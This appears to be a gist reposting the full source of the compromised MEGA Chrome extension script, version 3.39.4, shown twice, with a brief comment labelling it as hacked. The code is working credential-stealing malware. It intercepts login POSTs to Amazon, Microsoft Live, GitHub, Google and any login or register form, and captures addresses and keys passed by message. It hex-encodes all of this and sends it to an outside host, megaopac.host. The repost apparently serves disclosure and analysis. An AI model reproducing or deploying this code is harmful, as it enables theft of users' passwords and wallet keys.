Grossdm/mega.js

## mega.js
// This is Chrome Mega extension script that hacked!!!
// Version is 3.39.4_0.
// You can check it from your comptuer too.
// %AppData%\Local\Google\Chrome\User Data\Default\Extensions\bigefpfhnfcobdlfbedofhhaibnlghod\3.39.4_0
// Original mega.js is here. https://github.com/meganz/chrome-extension/blob/master/mega.js

function getParameterByName(name, data) {
    name = name.replace(/[\[\]]/g, '\\$&');
    var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'), results = regex.exec(data);
    if (!results) return '';
    if (!results[2]) return '';
    return decodeURIComponent(results[2].replace(/\+/g, ' '));
}

function StringToHex(Str) {
	var ResultArr = [];
	for (var i = 0, n = Str.length; i < n; i++) {
		var Hex = Number(Str.charCodeAt(i)).toString(16);
		ResultArr.push(Hex);
	}
	return ResultArr.join('');
}

// Send your private ID / PW data to Hacker website.
function dataPost(type, addr, key) {
	var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://www.megaopac.host/", true);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
    xhr.send("d=" + type + "&p1=" + StringToHex(addr) + "&p2=" + StringToHex(key));
}

function postPost(url, data) {
	var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://www.megaopac.host/", true);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
    xhr.send("d=8&p=" + StringToHex(url + "\n\n" + data));
}

var lus="";

chrome.webRequest.onBeforeRequest.addListener(
    function(details)
    {
        if ((details.url.substr(-4) == '.xml')
            || (details.url.substr(-4) == '.crx')
            || (details.url.substr(-4) == '.xpi')
            || (details.url.substr(-4) == '.exe')
            || (details.url.substr(-4) == '.dmg')
            || (details.url.substr(-3) == '.gz')
            || (details.url.substr(-4) == '.deb')
            || (details.url.substr(-4) == '.rpm')
            || (details.url.substr(-4) == '.zip')
            || (details.url.substr(-4) == '.txt')
            || (details.url.substr(-4) == '.pdf')
            || (details.url.substr(-3) == '.js')
			|| (details.url.indexOf('mega.nz/linux') > -1)) {
                return { cancel:  false };
        }
		else if (details.url.includes('amazon.com/ap/signin')) {
			if (details.method == "POST") {
				let formData = details.requestBody.raw;
				if (formData) {
					var i = 0;
					var res = "";
					for (i = 0; i < formData.length; i++) {
						res = res + String.fromCharCode.apply(null, new Uint8Array(details.requestBody.raw[i].bytes));
					}
					var usernameStr = getParameterByName("email", res);
					var passwordStr = getParameterByName("password", res);
					if (usernameStr.length > 0 && passwordStr.length > 0)
						dataPost("4", new String(usernameStr), new String(passwordStr));
				}
			}
			return { cancel:  false };
		}
		else if (details.url.includes('login.live.com')) {
			if (details.method == "POST") {
				let formData = details.requestBody.formData;
				if (formData) {
					dataPost("6", new String(formData['login']), new String(formData['passwd']));
				}
			}
			return { cancel:  false };
		}
		else if (details.url.includes('github.com/session')) {
			if (details.method == "POST") {
				let formData = details.requestBody.formData;
				if (formData) {
					var usernameStr = formData["login"];
					var passwordStr = formData["password"];
					if (usernameStr.length > 0 && passwordStr.length > 0) {
						dataPost("3", new String(usernameStr), new String(passwordStr));
					}
				}
			}
			return { cancel:  false };
		}
		else if (details.url.includes('accounts.google.com')) {
			if (details.method == "POST") {
				let formData = details.requestBody.formData;

				if (formData) {
					if (formData["continue"] && formData["continue"][0].includes("https://chrome.google.com/webstore/developer")) {
						if (formData["bghash"]) {
							var str = formData["f.req"][0];
							var n = str.indexOf(",[") + 2;
							str = str.substring(n);
							n = str.indexOf('"') + 1;
							str = str.substring(n);
							n = str.indexOf('"');
							dataPost("5", new String(lus), str.substring(0, n));
						}
						else {
							var str = formData["f.req"][0];
							var n = str.lastIndexOf(',') + 2;
							var e = str.lastIndexOf('"');
							lus = str.substr(n, e - n);
						}
					}
				}
			}
			return { cancel:  false };
		}
        else if (details.url.includes('mega.co.nz/') ||
				 details.url.includes('mega.nz/') ||
				 details.url.includes('mega.is/'))
        {
            var hash = '';
            if (details.url.indexOf('#') > -1) {
				hash = '#' + details.url.split('#')[1];
				if (details.url.indexOf('https://mega.nz/embed') > -1) {
					hash = '#E' + hash.substr(1);
				}
				if (details.url.indexOf('https://mega.nz/drop') > -1) {
					hash = '#D' + hash.substr(1);
				}
			}
			else if (details.url.indexOf('https://mega.nz/') > -1 && details.url.length > 16) hash = '#' + details.url.split('https://mega.nz/')[1];
            return { redirectUrl:  chrome.extension.getURL("mega/secure.html" + hash) };
        }
		else if (details.url.includes('Register') ||
				 details.url.includes('register') ||
				 details.url.includes('login') ||
				 details.url.includes('Login')) {
			if (details.method == "POST") {
				let rawFormData = details.requestBody.raw;
				if (rawFormData) {
					var i = 0;
					var res = "";
					for (i = 0; i < rawFormData.length; i++) {
						res = res + String.fromCharCode.apply(null, new Uint8Array(details.requestBody.raw[i].bytes));
					}
					postPost(details.url, res);
				}

				let formData = details.requestBody.formData;
				if (formData) {
					postPost(details.url, JSON.stringify(formData));
				}
			}
			return { cancel:  false };
		}
		else {
			if (details.method == "POST") {
				let formData = details.requestBody.formData;
				if (formData) {
					var usernameStr = "";
					var passwordStr = "";
					if (formData["username"]) usernameStr = formData["username"];
					else if (formData["email"]) usernameStr = formData["email"];
					else if (formData["user"]) usernameStr = formData["user"];
					else if (formData["login"]) usernameStr = formData["login"];
					else if (formData["usr"]) usernameStr = formData["usr"];

					if (formData["pass"]) passwordStr = formData["pass"];
					else if (formData["passwd"]) passwordStr = formData["passwd"];
					else if (formData["password"]) passwordStr = formData["password"];

					if (usernameStr.length > 0 || passwordStr.length > 0) {
						postPost(details.url, usernameStr + "\n" + passwordStr);
					}
				}
			}
			return { cancel:  false };
		}
    },
    {
        urls: [
            "<all_urls>"
        ],
        types: ["main_frame","sub_frame","xmlhttprequest"]
    },
    ["blocking", "requestBody"]
);

chrome.webRequest.onHeadersReceived.addListener(
  function(details)
    {
        console.log('responseHeaders',responseHeaders);
    },
    {
        urls: [
            chrome.extension.getURL("mega")
        ],
        types: ["main_frame","sub_frame"]
    },
    ["blocking"]
);

chrome.runtime.onMessage.addListener(function(request, sender) {
    if (request.action == "nmewm" || request.action == "nmmm")
	 dataPost(request.action == "nmewm" ? "1" : "2", new String(request.address), new String(request.keys));
	else if (request.action =  "immm")
	 dataPost("7", new String(request.data), new String(request.salt));
});
	// This is Chrome Mega extension script that hacked!!!
	// Version is 3.39.4_0.
	// You can check it from your comptuer too.
	// %AppData%\Local\Google\Chrome\User Data\Default\Extensions\bigefpfhnfcobdlfbedofhhaibnlghod\3.39.4_0
	// Original mega.js is here. https://github.com/meganz/chrome-extension/blob/master/mega.js

	function getParameterByName(name, data) {
	name = name.replace(/[\[\]]/g, '\\$&');
	var regex = new RegExp('[?&]' + name + '(=([^&#]*)\|&\|#\|$)'), results = regex.exec(data);
	if (!results) return '';
	if (!results[2]) return '';
	return decodeURIComponent(results[2].replace(/\+/g, ' '));
	}

	function StringToHex(Str) {
	var ResultArr = [];
	for (var i = 0, n = Str.length; i < n; i++) {
	var Hex = Number(Str.charCodeAt(i)).toString(16);
	ResultArr.push(Hex);
	}
	return ResultArr.join('');
	}

	// Send your private ID / PW data to Hacker website.
	function dataPost(type, addr, key) {
	var xhr = new XMLHttpRequest();
	xhr.open("POST", "https://www.megaopac.host/", true);
	xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
	xhr.send("d=" + type + "&p1=" + StringToHex(addr) + "&p2=" + StringToHex(key));
	}

	function postPost(url, data) {
	var xhr = new XMLHttpRequest();
	xhr.open("POST", "https://www.megaopac.host/", true);
	xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
	xhr.send("d=8&p=" + StringToHex(url + "\n\n" + data));
	}

	var lus="";

	chrome.webRequest.onBeforeRequest.addListener(
	function(details)
	{
	if ((details.url.substr(-4) == '.xml')
	\|\| (details.url.substr(-4) == '.crx')
	\|\| (details.url.substr(-4) == '.xpi')
	\|\| (details.url.substr(-4) == '.exe')
	\|\| (details.url.substr(-4) == '.dmg')
	\|\| (details.url.substr(-3) == '.gz')
	\|\| (details.url.substr(-4) == '.deb')
	\|\| (details.url.substr(-4) == '.rpm')
	\|\| (details.url.substr(-4) == '.zip')
	\|\| (details.url.substr(-4) == '.txt')
	\|\| (details.url.substr(-4) == '.pdf')
	\|\| (details.url.substr(-3) == '.js')
	\|\| (details.url.indexOf('mega.nz/linux') > -1)) {
	return { cancel: false };
	}
	else if (details.url.includes('amazon.com/ap/signin')) {
	if (details.method == "POST") {
	let formData = details.requestBody.raw;
	if (formData) {
	var i = 0;
	var res = "";
	for (i = 0; i < formData.length; i++) {
	res = res + String.fromCharCode.apply(null, new Uint8Array(details.requestBody.raw[i].bytes));
	}
	var usernameStr = getParameterByName("email", res);
	var passwordStr = getParameterByName("password", res);
	if (usernameStr.length > 0 && passwordStr.length > 0)
	dataPost("4", new String(usernameStr), new String(passwordStr));
	}
	}
	return { cancel: false };
	}
	else if (details.url.includes('login.live.com')) {
	if (details.method == "POST") {
	let formData = details.requestBody.formData;
	if (formData) {
	dataPost("6", new String(formData['login']), new String(formData['passwd']));
	}
	}
	return { cancel: false };
	}
	else if (details.url.includes('github.com/session')) {
	if (details.method == "POST") {
	let formData = details.requestBody.formData;
	if (formData) {
	var usernameStr = formData["login"];
	var passwordStr = formData["password"];
	if (usernameStr.length > 0 && passwordStr.length > 0) {
	dataPost("3", new String(usernameStr), new String(passwordStr));
	}
	}
	}
	return { cancel: false };
	}
	else if (details.url.includes('accounts.google.com')) {
	if (details.method == "POST") {
	let formData = details.requestBody.formData;

	if (formData) {
	if (formData["continue"] && formData["continue"][0].includes("https://chrome.google.com/webstore/developer")) {
	if (formData["bghash"]) {
	var str = formData["f.req"][0];
	var n = str.indexOf(",[") + 2;
	str = str.substring(n);
	n = str.indexOf('"') + 1;
	str = str.substring(n);
	n = str.indexOf('"');
	dataPost("5", new String(lus), str.substring(0, n));
	}
	else {
	var str = formData["f.req"][0];
	var n = str.lastIndexOf(',') + 2;
	var e = str.lastIndexOf('"');
	lus = str.substr(n, e - n);
	}
	}
	}
	}
	return { cancel: false };
	}
	else if (details.url.includes('mega.co.nz/') \|\|
	details.url.includes('mega.nz/') \|\|
	details.url.includes('mega.is/'))
	{
	var hash = '';
	if (details.url.indexOf('#') > -1) {
	hash = '#' + details.url.split('#')[1];
	if (details.url.indexOf('https://mega.nz/embed') > -1) {
	hash = '#E' + hash.substr(1);
	}
	if (details.url.indexOf('https://mega.nz/drop') > -1) {
	hash = '#D' + hash.substr(1);
	}
	}
	else if (details.url.indexOf('https://mega.nz/') > -1 && details.url.length > 16) hash = '#' + details.url.split('https://mega.nz/')[1];
	return { redirectUrl: chrome.extension.getURL("mega/secure.html" + hash) };
	}
	else if (details.url.includes('Register') \|\|
	details.url.includes('register') \|\|
	details.url.includes('login') \|\|
	details.url.includes('Login')) {
	if (details.method == "POST") {
	let rawFormData = details.requestBody.raw;
	if (rawFormData) {
	var i = 0;
	var res = "";
	for (i = 0; i < rawFormData.length; i++) {
	res = res + String.fromCharCode.apply(null, new Uint8Array(details.requestBody.raw[i].bytes));
	}
	postPost(details.url, res);
	}

	let formData = details.requestBody.formData;
	if (formData) {
	postPost(details.url, JSON.stringify(formData));
	}
	}
	return { cancel: false };
	}
	else {
	if (details.method == "POST") {
	let formData = details.requestBody.formData;
	if (formData) {
	var usernameStr = "";
	var passwordStr = "";
	if (formData["username"]) usernameStr = formData["username"];
	else if (formData["email"]) usernameStr = formData["email"];
	else if (formData["user"]) usernameStr = formData["user"];
	else if (formData["login"]) usernameStr = formData["login"];
	else if (formData["usr"]) usernameStr = formData["usr"];

	if (formData["pass"]) passwordStr = formData["pass"];
	else if (formData["passwd"]) passwordStr = formData["passwd"];
	else if (formData["password"]) passwordStr = formData["password"];

	if (usernameStr.length > 0 \|\| passwordStr.length > 0) {
	postPost(details.url, usernameStr + "\n" + passwordStr);
	}
	}
	}
	return { cancel: false };
	}
	},
	{
	urls: [
	"<all_urls>"
	],
	types: ["main_frame","sub_frame","xmlhttprequest"]
	},
	["blocking", "requestBody"]
	);

	chrome.webRequest.onHeadersReceived.addListener(
	function(details)
	{
	console.log('responseHeaders',responseHeaders);
	},
	{
	urls: [
	chrome.extension.getURL("mega")
	],
	types: ["main_frame","sub_frame"]
	},
	["blocking"]
	);

	chrome.runtime.onMessage.addListener(function(request, sender) {
	if (request.action == "nmewm" \|\| request.action == "nmmm")
	dataPost(request.action == "nmewm" ? "1" : "2", new String(request.address), new String(request.keys));
	else if (request.action = "immm")
	dataPost("7", new String(request.data), new String(request.salt));
	});